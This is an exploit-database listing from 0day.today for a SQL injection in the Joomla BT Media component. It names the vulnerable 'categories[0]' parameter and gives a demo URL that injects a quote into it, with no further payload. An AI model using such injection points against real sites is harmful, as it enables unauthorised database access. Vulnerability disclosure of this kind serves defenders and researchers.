[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla BT Media Component (com_bt_media) - SQL Injection

Author
Mojtaba MobhaM
Risk
[
Security Risk High
]
0day-ID
0day-ID-25121
Category
web applications
Date add
19-06-2016
Platform
php
######################
# Exploit Title : Joomla com_bt_media - SQL Injection
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/bt-media-gallery
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 1.0
# Date: 2016/06/19
######################
#
# PoC:
  
# categories[0]= Parameter Vulnerable To SQL
  
# Demo :
  
# http://server/index.php?option=com_bt_media&view=list&categories[0]=%277&Itemid=134
 
  
# Please Free Yaser Ebrahimi
  
######################
# Discovered by : Mojtaba MobhaM

#  0day.today [2024-11-15]  #